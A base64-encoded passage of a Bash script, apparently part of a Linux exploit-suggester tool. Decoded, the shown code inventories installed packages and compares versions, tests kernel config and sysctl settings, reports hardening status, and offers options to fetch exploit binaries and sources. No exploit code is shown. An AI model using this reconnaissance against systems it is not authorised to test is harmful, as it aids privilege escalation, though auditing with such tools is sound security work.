JHBrZ2xpc3RfZmlsZSIgfCBoZWFkIC0xKSIgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIpCiAgICAgICAgICAgIE9TPSJtYWdlaWEiCiAgICAgICAgIyBwYWNtYW4gcGFja2FnZSBsaXN0aW5nIGZpbGUKICAgICAgICBlbGlmIFsgIiQoZ3JlcCAtRSAnXCBbMC05XStcLicgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiIHwgYXdrICd7cHJpbnQgJDEiLSIkMn0nKQogICAgICAgICAgICBPUz0iYXJjaCIKICAgICAgICAjIGZpbGUgbm90IHJlY29nbml6ZWQgLSBza2lwcGluZwogICAgICAgIGVsc2UKICAgICAgICAgICAgUEtHX0xJU1Q9IiIKICAgICAgICBmaQoKICAgIGVsaWYgWyAiJGRpc3RybyIgPSAiZGViaWFuIiAtbyAiJGRpc3RybyIgPSAidWJ1bnR1IiAtbyAiJGRpc3RybyIgPSAiZGVlcGluIiBdOyB0aGVuCiAgICAgICAgUEtHX0xJU1Q9JChkcGtnIC1sIHwgYXdrICd7cHJpbnQgJDIiLSIkM30nIHwgc2VkICdzLzphbWQ2NC8vZycpCiAgICBlbGlmIFsgIiRkaXN0cm8iID0gIlJIRUwiIC1vICIkZGlzdHJvIiA9ICJmZWRvcmEiIC1vICIkZGlzdHJvIiA9ICJtYWdlaWEiIF07IHRoZW4KICAgICAgICBQS0dfTElTVD0kKHJwbSAtcWEpCiAgICBlbGlmIFsgIiRkaXN0cm8iID0gImFyY2giIC1vICIkZGlzdHJvIiA9ICJtYW5qYXJvIiBdOyB0aGVuCiAgICAgICAgUEtHX0xJU1Q9JChwYWNtYW4gLVEgfCBhd2sgJ3twcmludCAkMSItIiQyfScpCiAgICBlbGlmIFsgLXggL3Vzci9iaW4vZXF1ZXJ5IF07IHRoZW4KICAgICAgICBQS0dfTElTVD0kKC91c3IvYmluL2VxdWVyeSAtLXF1aWV0IGxpc3QgJyonIC1GICckbmFtZTokdmVyc2lvbicgfCBjdXQgLWQvIC1mMi0gfCBhd2sgJ3twcmludCAkMSI6IiQyfScpCiAgICBlbHNlCiAgICAgICAgIyBwYWNrYWdlcyBsaXN0aW5nIG5vdCBhdmFpbGFibGUKICAgICAgICBQS0dfTElTVD0iIgogICAgZmkKfQoKIyBmcm9tOiBodHRwczovL3N0YWNrb3ZlcmZsb3cuY29tL3F1ZXN0aW9ucy80MDIzODMwL2hvdy1jb21wYXJlLXR3by1zdHJpbmdzLWluLWRvdC1zZXBhcmF0ZWQtdmVyc2lvbi1mb3JtYXQtaW4tYmFzaAp2ZXJDb21wYXJpc2lvbigpIHsKCiAgICBpZiBbWyAkMSA9PSAkMiBdXQogICAgdGhlbgogICAgICAgIHJldHVybiAwCiAgICBmaQoKICAgIGxvY2FsIElGUz0uCiAgICBsb2NhbCBpIHZlcjE9KCQxKSB2ZXIyPSgkMikKCiAgICAjIGZpbGwgZW1wdHkgZmllbGRzIGluIHZlcjEgd2l0aCB6ZXJvcwogICAgZm9yICgoaT0keyN2ZXIxW0BdfTsgaTwkeyN2ZXIyW0BdfTsgaSsrKSkKICAgIGRvCiAgICAgICAgdmVyMVtpXT0wCiAgICBkb25lCgogICAgZm9yICgoaT0wOyBpPCR7I3ZlcjFbQF19OyBpKyspKQogICAgZG8KICAgICAgICBpZiBbWyAteiAke3ZlcjJbaV19IF1dCiAgICAgICAgdGhlbgogICAgICAgICAgICAjIGZpbGwgZW1wdHkgZmllbGRzIGluIHZlcjIgd2l0aCB6ZXJvcwogICAgICAgICAgICB2ZXIyW2ldPTAKICAgICAgICBmaQogICAgICAgIGlmICgoMTAjJHt2ZXIxW2ldfSA+IDEwIyR7dmVyMltpXX0pKQogICAgICAgIHRoZW4KICAgICAgICAgICAgcmV0dXJuIDEKICAgICAgICBmaQogICAgICAgIGlmICgoMTAjJHt2ZXIxW2ldfSA8IDEwIyR7dmVyMltpXX0pKQogICAgICAgIHRoZW4KICAgICAgICAgICAgcmV0dXJuIDIKICAgICAgICBmaQogICAgZG9uZQoKICAgIHJldHVybiAwCn0KCmRvVmVyc2lvbkNvbXBhcmlzaW9uKCkgewogICAgbG9jYWwgcmVxVmVyc2lvbj0iJDEiCiAgICBsb2NhbCByZXFSZWxhdGlvbj0iJDIiCiAgICBsb2NhbCBjdXJyZW50VmVyc2lvbj0iJDMiCgogICAgdmVyQ29tcGFyaXNpb24gJGN1cnJlbnRWZXJzaW9uICRyZXFWZXJzaW9uCiAgICBjYXNlICQ/IGluCiAgICAgICAgMCkgY3VycmVudFJlbGF0aW9uPSc9Jzs7CiAgICAgICAgMSkgY3VycmVudFJlbGF0aW9uPSc+Jzs7CiAgICAgICAgMikgY3VycmVudFJlbGF0aW9uPSc8Jzs7CiAgICBlc2FjCgogICAgaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPSIgXTsgdGhlbgogICAgICAgIFsgJGN1cnJlbnRSZWxhdGlvbiA9PSAiPSIgXSAmJiByZXR1cm4gMAogICAgZWxpZiBbICIkcmVxUmVsYXRpb24iID09ICI+IiBdOyB0aGVuCiAgICAgICAgWyAkY3VycmVudFJlbGF0aW9uID09ICI+IiBdICYmIHJldHVybiAwCiAgICBlbGlmIFsgIiRyZXFSZWxhdGlvbiIgPT0gIjwiIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIjwiIF0gJiYgcmV0dXJuIDAKICAgIGVsaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPj0iIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj0iIF0gJiYgcmV0dXJuIDAKICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj4iIF0gJiYgcmV0dXJuIDAKICAgIGVsaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPD0iIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj0iIF0gJiYgcmV0dXJuIDAKICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIjwiIF0gJiYgcmV0dXJuIDAKICAgIGZpCn0KCmNvbXBhcmVWYWx1ZXMoKSB7CiAgICBjdXJWYWw9JDEKICAgIHZhbD0kMgogICAgc2lnbj0kMwoKICAgIGlmIFsgIiRzaWduIiA9PSAiPT0iIF07IHRoZW4KICAgICAgICBbICIkdmFsIiA9PSAiJGN1clZhbCIgXSAmJiByZXR1cm4gMAogICAgZWxpZiBbICIkc2lnbiIgPT0gIiE9IiBdOyB0aGVuCiAgICAgICAgWyAiJHZhbCIgIT0gIiRjdXJWYWwiIF0gJiYgcmV0dXJuIDAKICAgIGZpCgogICAgcmV0dXJuIDEKfQoKY2hlY2tSZXF1aXJlbWVudCgpIHsKICAgICNlY2hvICJDaGVja2luZyByZXF1aXJlbWVudDogJDEiCiAgICBsb2NhbCBJTj0iJDEiCiAgICBsb2NhbCBwa2dOYW1lPSIkezI6NH0iCgogICAgaWYgW1sgIiRJTiIgPX4gXnBrZz0uKiQgXV07IHRoZW4KCiAgICAgICAgIyBhbHdheXMgdHJ1ZSBmb3IgTGludXggT1MKICAgICAgICBbICR7cGtnTmFtZX0gPT0gImxpbnV4LWtlcm5lbCIgXSAmJiByZXR1cm4gMAoKICAgICAgICAjIHZlcmlmeSBpZiBwYWNrYWdlIGlzIHByZXNlbnQgCiAgICAgICAgcGtnPSQoZWNobyAiJFBLR19MSVNUIiB8IGdyZXAgLUUgLWkgIl4kcGtnTmFtZS1bMC05XSsiIHwgaGVhZCAtMSkKICAgICAgICBpZiBbIC1uICIkcGtnIiBdOyB0aGVuCiAgICAgICAgICAgIHJldHVybiAwCiAgICAgICAgZmkKCiAgICBlbGlmIFtbICIkSU4iID1+IF52ZXIuKiQgXV07IHRoZW4KICAgICAgICB2ZXJzaW9uPSIke0lOLy9bXjAtOS5dL30iCiAgICAgICAgcmVzdD0iJHtJTiN2ZXJ9IgogICAgICAgIG9wZXJhdG9yPSR7cmVzdCUkdmVyc2lvbn0KCiAgICAgICAgaWYgWyAiJHBrZ05hbWUiID09ICJsaW51eC1rZXJuZWwiIC1vICIkb3B0X2NoZWNrc2VjX21vZGUiID09ICJ0cnVlIiBdOyB0aGVuCgogICAgICAgICAgICAjIGZvciAtLWN2ZWxpc3QtZmlsZSBtb2RlIHNraXAga2VybmVsIHZlcnNpb24gY29tcGFyaXNpb24KICAgICAgICAgICAgWyAiJG9wdF9jdmVsaXN0X2ZpbGUiID0gInRydWUiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgICAgIGRvVmVyc2lvbkNvbXBhcmlzaW9uICR2ZXJzaW9uICRvcGVyYXRvciAkS0VSTkVMICYmIHJldHVybiAwCiAgICAgICAgZWxzZQogICAgICAgICAgICAjIGV4dHJhY3QgcGFja2FnZSB2ZXJzaW9uIGFuZCBjaGVjayBpZiByZXF1aXJlbW50IGlzIHRydWUKICAgICAgICAgICAgcGtnPSQoZWNobyAiJFBLR19MSVNUIiB8IGdyZXAgLUUgLWkgIl4kcGtnTmFtZS1bMC05XSsiIHwgaGVhZCAtMSkKCiAgICAgICAgICAgICMgc2tpcCAoaWYgcnVuIHdpdGggLS1za2lwLXBrZy12ZXJzaW9ucykgdmVyc2lvbiBjaGVja2luZyBpZiBwYWNrYWdlIHdpdGggZ2l2ZW4gbmFtZSBpcyBpbnN0YWxsZWQKICAgICAgICAgICAgWyAiJG9wdF9za2lwX3BrZ192ZXJzaW9ucyIgPSAidHJ1ZSIgLWEgLW4gIiRwa2ciIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgICAgICMgdmVyc2lvbmluZzoKICAgICAgICAgICAgI2VjaG8gInBrZzogJHBrZyIKICAgICAgICAgICAgcGtnVmVyc2lvbj0kKGVjaG8gIiRwa2ciIHwgZ3JlcCAtRSAtaSAtbyAtZSAnLVtcLjAtOVwrOnBdK1stXCtdJyB8IGN1dCAtZCc6JyAtZjIgfCBzZWQgJ3MvW1wrLV0vL2cnIHwgc2VkICdzL3BbMC05XS8vZycpCiAgICAgICAgICAgICNlY2hvICJ2ZXJzaW9uOiAkcGtnVmVyc2lvbiIKICAgICAgICAgICAgI2VjaG8gIm9wZXJhdG9yOiAkb3BlcmF0b3IiCiAgICAgICAgICAgICNlY2hvICJyZXF1aXJlZCB2ZXJzaW9uOiAkdmVyc2lvbiIKICAgICAgICAgICAgI2VjaG8KICAgICAgICAgICAgZG9WZXJzaW9uQ29tcGFyaXNpb24gJHZlcnNpb24gJG9wZXJhdG9yICRwa2dWZXJzaW9uICYmIHJldHVybiAwCiAgICAgICAgZmkKICAgIGVsaWYgW1sgIiRJTiIgPX4gXng4Nl82NCQgXV0gJiYgWyAiJEFSQ0giID09ICJ4ODZfNjQiIC1vICIkQVJDSCIgPT0gIiIgXTsgdGhlbgogICAgICAgIHJldHVybiAwCiAgICBlbGlmIFtbICIkSU4iID1+IF54ODYkIF1dICYmIFsgIiRBUkNIIiA9PSAiaTM4NiIgLW8gIiRBUkNIIiA9PSAiaTY4NiIgLW8gIiRBUkNIIiA9PSAiIiBdOyB0aGVuCiAgICAgICAgcmV0dXJuIDAKICAgIGVsaWYgW1sgIiRJTiIgPX4gXkNPTkZJR18uKiQgXV07IHRoZW4KCiAgICAgICAgIyBza2lwIGlmIGNoZWNrIGlzIG5vdCBhcHBsaWNhYmxlICgtayBvciAtLXVuYW1lIG9yIC1wIHNldCkgb3IgaWYgdXNlciBzYWlkIHNvICgtLXNraXAtbW9yZS1jaGVja3MpCiAgICAgICAgWyAiJG9wdF9za2lwX21vcmVfY2hlY2tzIiA9ICJ0cnVlIiBdICYmIHJldHVybiAwCgogICAgICAgICMgaWYga2VybmVsIGNvbmZpZyBJUyBhdmFpbGFibGU6CiAgICAgICAgaWYgWyAtbiAiJEtDT05GSUciIF07IHRoZW4KICAgICAgICAgICAgaWYgJEtDT05GSUcgfCBncmVwIC1FIC1xaSAkSU47IHRoZW4KICAgICAgICAgICAgICAgIHJldHVybiAwOwogICAgICAgICAgICAjIHJlcXVpcmVkIG9wdGlvbiB3YXNuJ3QgZm91bmQsIGV4cGxvaXQgaXMgbm90IGFwcGxpY2FibGUKICAgICAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgcmV0dXJuIDE7CiAgICAgICAgICAgIGZpCiAgICAgICAgIyBjb25maWcgaXMgbm90IGF2YWlsYWJsZQogICAgICAgIGVsc2UKICAgICAgICAgICAgcmV0dXJuIDA7CiAgICAgICAgZmkKICAgIGVsaWYgW1sgIiRJTiIgPX4gXnN5c2N0bDouKiQgXV07IHRoZW4KCiAgICAgICAgIyBza2lwIGlmIGNoZWNrIGlzIG5vdCBhcHBsaWNhYmxlICgtayBvciAtLXVuYW1lIG9yIC1wIG1vZGVzKSBvciBpZiB1c2VyIHNhaWQgc28gKC0tc2tpcC1tb3JlLWNoZWNrcykKICAgICAgICBbICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gInRydWUiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgc3lzY3RsQ29uZGl0aW9uPSIke0lOOjd9IgoKICAgICAgICAjIGV4dHJhY3Qgc3lzY3RsIGVudHJ5LCByZWxhdGlvbiBzaWduIGFuZCByZXF1aXJlZCB2YWx1ZQogICAgICAgIGlmIGVjaG8gJHN5c2N0bENvbmRpdGlvbiB8IGdyZXAgLXFpICIhPSI7IHRoZW4KICAgICAgICAgICAgc2lnbj0iIT0iCiAgICAgICAgZWxpZiBlY2hvICRzeXNjdGxDb25kaXRpb24gfCBncmVwIC1xaSAiPT0iOyB0aGVuCiAgICAgICAgICAgIHNpZ249Ij09IgogICAgICAgIGVsc2UKICAgICAgICAgICAgZXhpdFdpdGhFcnJNc2cgIldyb25nIHN5c2N0bCBjb25kaXRpb24uIFRoZXJlIGlzIHN5bnRheCBlcnJvciBpbiB5b3VyIGZlYXR1cmVzIERCLiBBYm9ydGluZy4iCiAgICAgICAgZmkKICAgICAgICB2YWw9JChlY2hvICIkc3lzY3RsQ29uZGl0aW9uIiB8IGF3ayAtRiAiJHNpZ24iICd7cHJpbnQgJDJ9JykKICAgICAgICBlbnRyeT0kKGVjaG8gIiRzeXNjdGxDb25kaXRpb24iIHwgYXdrIC1GICIkc2lnbiIgJ3twcmludCAkMX0nKQoKICAgICAgICAjIGdldCBjdXJyZW50IHNldHRpbmcgb2Ygc3lzY3RsIGVudHJ5CiAgICAgICAgY3VyVmFsPSQoL3NiaW4vc3lzY3RsIC1hIDI+IC9kZXYvbnVsbCB8IGdyZXAgIiRlbnRyeSIgfCBhd2sgLUYnPScgJ3twcmludCAkMn0nKQoKICAgICAgICAjIHNwZWNpYWwgY2FzZSBmb3IgLS1jaGVja3NlYyBtb2RlOiByZXR1cm4gMiBpZiB0aGVyZSBpcyBubyBzdWNoIHN3aXRjaCBpbiBzeXNjdGwKICAgICAgICBbIC16ICIkY3VyVmFsIiAtYSAiJG9wdF9jaGVja3NlY19tb2RlIiA9ICJ0cnVlIiBdICYmIHJldHVybiAyCgogICAgICAgICMgZm9yIG90aGVyIG1vZGVzOiBza2lwIGlmIHRoZXJlIGlzIG5vIHN1Y2ggc3dpdGNoIGluIHN5c2N0bAogICAgICAgIFsgLXogIiRjdXJWYWwiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgIyBjb21wYXJlICYgcmV0dXJuIHJlc3VsdAogICAgICAgIGNvbXBhcmVWYWx1ZXMgJGN1clZhbCAkdmFsICRzaWduICYmIHJldHVybiAwCgogICAgZWxpZiBbWyAiJElOIiA9fiBeY21kOi4qJCBdXTsgdGhlbgoKICAgICAgICAjIHNraXAgaWYgY2hlY2sgaXMgbm90IGFwcGxpY2FibGUgKC1rIG9yIC0tdW5hbWUgb3IgLXAgbW9kZXMpIG9yIGlmIHVzZXIgc2FpZCBzbyAoLS1za2lwLW1vcmUtY2hlY2tzKQogICAgICAgIFsgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPSAidHJ1ZSIgXSAmJiByZXR1cm4gMAoKICAgICAgICBjbWQ9IiR7SU46NH0iCiAgICAgICAgaWYgZXZhbCAiJHtjbWR9IjsgdGhlbgogICAgICAgICAgICByZXR1cm4gMAogICAgICAgIGZpCiAgICBmaQoKICAgIHJldHVybiAxCn0KCmdldEtlcm5lbENvbmZpZygpIHsKCiAgICBpZiBbIC1mIC9wcm9jL2NvbmZpZy5neiBdIDsgdGhlbgogICAgICAgIEtDT05GSUc9InpjYXQgL3Byb2MvY29uZmlnLmd6IgogICAgZWxpZiBbIC1mIC9ib290L2NvbmZpZy1gdW5hbWUgLXJgIF0gOyB0aGVuCiAgICAgICAgS0NPTkZJRz0iY2F0IC9ib290L2NvbmZpZy1gdW5hbWUgLXJgIgogICAgZWxpZiBbIC1mICIke0tCVUlMRF9PVVRQVVQ6LS91c3Ivc3JjL2xpbnV4fSIvLmNvbmZpZyBdIDsgdGhlbgogICAgICAgIEtDT05GSUc9ImNhdCAke0tCVUlMRF9PVVRQVVQ6LS91c3Ivc3JjL2xpbnV4fS8uY29uZmlnIgogICAgZWxzZQogICAgICAgIEtDT05GSUc9IiIKICAgIGZpCn0KCmNoZWNrc2VjTW9kZSgpIHsKCiAgICBNT0RFPTAKCiAgICAjIHN0YXJ0IGFuYWx5c2lzCmZvciBGRUFUVVJFIGluICIke0ZFQVRVUkVTW0BdfSI7IGRvCgogICAgIyBjcmVhdGUgYXJyYXkgZnJvbSBjdXJyZW50IGV4cGxvaXQgaGVyZSBkb2MgYW5kIGZldGNoIG5lZWRlZCBsaW5lcwogICAgaT0wCiAgICAjICgnLXInIGlzIHVzZWQgdG8gbm90IGludGVycHJldCBiYWNrc2xhc2ggdXNlZCBmb3IgYmFzaCBjb2xvcnMpCiAgICB3aGlsZSByZWFkIC1yIGxpbmUKICAgIGRvCiAgICAgICAgYXJyW2ldPSIkbGluZSIKICAgICAgICBpPSQoKGkgKyAxKSkKICAgIGRvbmUgPDw8ICIkRkVBVFVSRSIKCgkjIG1vZGVzOiBrZXJuZWwtZmVhdHVyZSAoMSkgfCBody1mZWF0dXJlICgyKSB8IDNyZHBhcnR5LWZlYXR1cmUgKDMpIHwgYXR0YWNrLXN1cmZhY2UgKDQpCiAgICBOQU1FPSIke2FyclswXX0iCiAgICBQUkVfTkFNRT0iJHtOQU1FOjA6OH0iCiAgICBOQU1FPSIke05BTUU6OX0iCiAgICBpZiBbICIke1BSRV9OQU1FfSIgPSAic2VjdGlvbjoiIF07IHRoZW4KCQkjIGFkdmFuY2UgdG8gbmV4dCBNT0RFCgkJTU9ERT0kKCgkTU9ERSArIDEpKQoKICAgICAgICBlY2hvCiAgICAgICAgZWNobyAtZSAiJHtibGR3aHR9JHtOQU1FfSR7dHh0cnN0fSIKICAgICAgICBlY2hvCiAgICAgICAgY29udGludWUKICAgIGZpCgogICAgQVZBSUxBQkxFPSIke2FyclsxXX0iICYmIEFWQUlMQUJMRT0iJHtBVkFJTEFCTEU6MTF9IgogICAgRU5BQkxFPSQoZWNobyAiJEZFQVRVUkUiIHwgZ3JlcCAiZW5hYmxlZDogIiB8IGF3ayAtRidlZDogJyAne3ByaW50ICQyfScpCiAgICBhbmFseXNpc191cmw9JChlY2hvICIkRkVBVFVSRSIgfCBncmVwICJhbmFseXNpcy11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKQoKICAgICMgc3BsaXQgbGluZSB3aXRoIGF2YWlsYWJpbGl0eSByZXF1aXJlbWVudHMgJiBsb29wIHRocnUgYWxsIGF2YWlsYWJpbGl0eSByZXFzIG9uZSBieSBvbmUgJiBjaGVjayB3aGV0aGVyIGl0IGlzIG1ldAogICAgSUZTPScsJyByZWFkIC1yIC1hIGFycmF5IDw8PCAiJEFWQUlMQUJMRSIKICAgIEFWQUlMQUJMRV9SRVFTX05VTT0keyNhcnJheVtAXX0KICAgIEFWQUlMQUJMRV9QQVNTRURfUkVRPTAKCUNPTkZJRz0iIgogICAgZm9yIFJFUSBpbiAiJHthcnJheVtAXX0iOyBkbwoKCQkjIGZpbmQgQ09ORklHXyBuYW1lIChpZiBwcmVzZW50KSBmb3IgY3VycmVudCBmZWF0dXJlIChvbmx5IGZvciBkaXNwbGF5IHB1cnBvc2VzKQoJCWlmIFsgLXogIiRDT05GSUciIF07IHRoZW4KCQkJY29uZmlnPSQoZWNobyAiJFJFUSIgfCBncmVwICJDT05GSUdfIikKCQkJWyAtbiAiJGNvbmZpZyIgXSAmJiBDT05GSUc9IigkKGVjaG8gJFJFUSB8IGN1dCAtZCc9JyAtZjEpKSIKCQlmaQoKICAgICAgICBpZiAoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIpOyB0aGVuCiAgICAgICAgICAgIEFWQUlMQUJMRV9QQVNTRURfUkVRPSQoKCRBVkFJTEFCTEVfUEFTU0VEX1JFUSArIDEpKQogICAgICAgIGVsc2UKICAgICAgICAgICAgYnJlYWsKICAgICAgICBmaQogICAgZG9uZQoKICAgICMgc3BsaXQgbGluZSB3aXRoIGVuYWJsZW1lbnQgcmVxdWlyZW1lbnRzICYgbG9vcCB0aHJ1IGFsbCBlbmFibGVtZW50IHJlcXMgb25lIGJ5IG9uZSAmIGNoZWNrIHdoZXRoZXIgaXQgaXMgbWV0CiAgICBFTkFCTEVfUEFTU0VEX1JFUT0wCiAgICBFTkFCTEVfUkVRU19OVU09MAogICAgbm9TeXNjdGw9MAogICAgaWYgWyAtbiAiJEVOQUJMRSIgXTsgdGhlbgogICAgICAgIElGUz0nLCcgcmVhZCAtciAtYSBhcnJheSA8PDwgIiRFTkFCTEUiCiAgICAgICAgRU5BQkxFX1JFUVNfTlVNPSR7I2FycmF5W0BdfQogICAgICAgIGZvciBSRVEgaW4gIiR7YXJyYXlbQF19IjsgZG8KICAgICAgICAgICAgY21kU3Rkb3V0PSQoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIpCiAgICAgICAgICAgIHJldFZhbD0kPwogICAgICAgICAgICBpZiBbICRyZXRWYWwgLWVxIDAgXTsgdGhlbgogICAgICAgICAgICAgICAgRU5BQkxFX1BBU1NFRF9SRVE9JCgoJEVOQUJMRV9QQVNTRURfUkVRICsgMSkpCiAgICAgICAgICAgIGVsaWYgWyAkcmV0VmFsIC1lcSAyIF07IHRoZW4KICAgICAgICAgICAgIyBzcGVjaWFsIGNhc2U6IHN5c2N0bCBlbnRyeSBpcyBub3QgcHJlc2VudCBvbiBnaXZlbiBzeXN0ZW06IHNpZ25hbCBpdCBhczogTi9BCiAgICAgICAgICAgICAgICBub1N5c2N0bD0xCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICBmaQogICAgICAgIGRvbmUKICAgIGZpCgogICAgZmVhdHVyZT0kKGVjaG8gIiRGRUFUVVJFIiB8IGdyZXAgImZlYXR1cmU6ICIgfCBjdXQgLWQnICcgLWYgMi0pCgoJaWYgWyAtbiAiJGNtZFN0ZG91dCIgXTsgdGhlbgogICAgICAgIGlmIFsgIiRjbWRTdGRvdXQiIC1lcSAwIF07IHRoZW4KICAgICAgICAgICAgc3RhdGU9IlsgJHt0eHRyZWR9U2V0IHRvICRjbWRTdGRvdXQke3R4dHJzdH0gXSIKCQkJY21kU3Rkb3V0PSIiCiAgICAgICAgZWxzZQogICAgICAgICAgICBzdGF0ZT0iWyAke3R4dGdybn1TZXQgdG8gJGNtZFN0ZG91dCR7dHh0cnN0fSBdIgoJCQljbWRTdGRvdXQ9IiIKICAgICAgICBmaQogICAgZWxzZQoKCXVua25vd249IlsgJHt0eHRncmF5fVVua25vd24ke3R4dHJzdH0gIF0iCgoJIyBmb3IgM3JkIHBhcnR5ICgzKSBtb2RlIGRpc3BsYXkgIk4vQSIgb3IgIkVuYWJsZWQiCglpZiBbICRNT0RFIC1lcSAzIF07IHRoZW4KICAgICAgICBlbmFibGVkPSJbICR7dHh0Z3JufUVuYWJsZWQke3R4dHJzdH0gICBdIgogICAgICAgIGRpc2FibGVkPSJbICAgJHt0eHRncmF5fU4vQSR7dHh0cnN0fSAgICBdIgoKICAgICMgZm9yIGF0dGFjay1zdXJmYWNlICg0KSBtb2RlIGRpc3BsYXkgIkxvY2tlZCIgb3IgIkV4cG9zZWQiCiAgICBlbGlmIFsgJE1PREUgLWVxIDQgXTsgdGhlbgogICAgICAgZW5hYmxlZD0iWyAke3R4dHJlZH1FeHBvc2VkJHt0eHRyc3R9ICBdIgogICAgICAgZGlzYWJsZWQ9IlsgJHt0eHRncm59TG9ja2VkJHt0eHRyc3R9ICAgXSIKCgkjb3RoZXIgbW9kZXMiICJEaXNhYmxlZCIgLyAiRW5hYmxlZCIKCWVsc2UKCQllbmFibGVkPSJbICR7dHh0Z3JufUVuYWJsZWQke3R4dHJzdH0gIF0iCgkJZGlzYWJsZWQ9IlsgJHt0eHRyZWR9RGlzYWJsZWQke3R4dHJzdH0gXSIKCWZpCgoJaWYgWyAteiAiJEtDT05GSUciIC1hICIkRU5BQkxFX1JFUVNfTlVNIiA9IDAgXTsgdGhlbgoJICAgIHN0YXRlPSR1bmtub3duCiAgICBlbGlmIFsgJEFWQUlMQUJMRV9QQVNTRURfUkVRIC1lcSAkQVZBSUxBQkxFX1JFUVNfTlVNIC1hICRFTkFCTEVfUEFTU0VEX1JFUSAtZXEgJEVOQUJMRV9SRVFTX05VTSBdOyB0aGVuCiAgICAgICAgc3RhdGU9JGVuYWJsZWQKICAgIGVsc2UKICAgICAgICBzdGF0ZT0kZGlzYWJsZWQKCWZpCgogICAgZmkKCiAgICBlY2hvIC1lICIgJHN0YXRlICRmZWF0dXJlICR7d2h0fSR7Q09ORklHfSR7dHh0cnN0fSIKICAgIFsgLW4gIiRhbmFseXNpc191cmwiIF0gJiYgZWNobyAtZSAiICAgICAgICAgICAgICAkYW5hbHlzaXNfdXJsIgogICAgZWNobwoKZG9uZQoKfQoKZGlzcGxheUV4cG9zdXJlKCkgewogICAgUkFOSz0kMQoKICAgIGlmIFsgIiRSQU5LIiAtZ2UgNiBdOyB0aGVuCiAgICAgICAgZWNobyAiaGlnaGx5IHByb2JhYmxlIgogICAgZWxpZiBbICIkUkFOSyIgLWdlIDMgXTsgdGhlbgogICAgICAgIGVjaG8gInByb2JhYmxlIgogICAgZWxzZQogICAgICAgIGVjaG8gImxlc3MgcHJvYmFibGUiCiAgICBmaQp9CgojIHBhcnNlIGNvbW1hbmQgbGluZSBwYXJhbWV0ZXJzCkFSR1M9JChnZXRvcHQgLS1vcHRpb25zICRTSE9SVE9QVFMgIC0tbG9uZ29wdGlvbnMgJExPTkdPUFRTIC0tICIkQCIpClsgJD8gIT0gMCBdICYmIGV4aXRXaXRoRXJyTXNnICJBYm9ydGluZy4iCgpldmFsIHNldCAtLSAiJEFSR1MiCgp3aGlsZSB0cnVlOyBkbwogICAgY2FzZSAiJDEiIGluCiAgICAgICAgLXV8LS11bmFtZSkKICAgICAgICAgICAgc2hpZnQKICAgICAgICAgICAgVU5BTUVfQT0iJDEiCiAgICAgICAgICAgIG9wdF91bmFtZV9zdHJpbmc9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1WfC0tdmVyc2lvbikKICAgICAgICAgICAgdmVyc2lvbgogICAgICAgICAgICBleGl0IDAKICAgICAgICAgICAgOzsKICAgICAgICAtaHwtLWhlbHApCiAgICAgICAgICAgIHVzYWdlIAogICAgICAgICAgICBleGl0IDAKICAgICAgICAgICAgOzsKICAgICAgICAtZnwtLWZ1bGwpCiAgICAgICAgICAgIG9wdF9mdWxsPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtZ3wtLXNob3J0KQogICAgICAgICAgICBvcHRfc3VtbWFyeT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLWJ8LS1mZXRjaC1iaW5hcmllcykKICAgICAgICAgICAgb3B0X2ZldGNoX2JpbnM9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1zfC0tZmV0Y2gtc291cmNlcykKICAgICAgICAgICAgb3B0X2ZldGNoX3NyY3M9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1rfC0ta2VybmVsKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBLRVJORUw9IiQxIgogICAgICAgICAgICBvcHRfa2VybmVsX3ZlcnNpb249dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1kfC0tc2hvdy1kb3MpCiAgICAgICAgICAgIG9wdF9zaG93X2Rvcz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLXB8LS1wa2dsaXN0LWZpbGUpCiAgICAgICAgICAgIHNoaWZ0CiAgICAgICAgICAgIFBLR0xJU1RfRklMRT0iJDEiCiAgICAgICAgICAgIG9wdF9wa2dsaXN0X2ZpbGU9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC0tY3ZlbGlzdC1maWxlKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBDVkVMSVNUX0ZJTEU9IiQxIgogICAgICAgICAgICBvcHRfY3ZlbGlzdF9maWxlPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtLWNoZWNrc2VjKQogICAgICAgICAgICBvcHRfY2hlY2tzZWNfbW9kZT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1rZXJuZWxzcGFjZS1vbmx5KQogICAgICAgICAgICBvcHRfa2VybmVsX29ubHk9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC0tdXNlcnNwYWNlLW9ubHkpCiAgICAgICAgICAgIG9wdF91c2Vyc3BhY2Vfb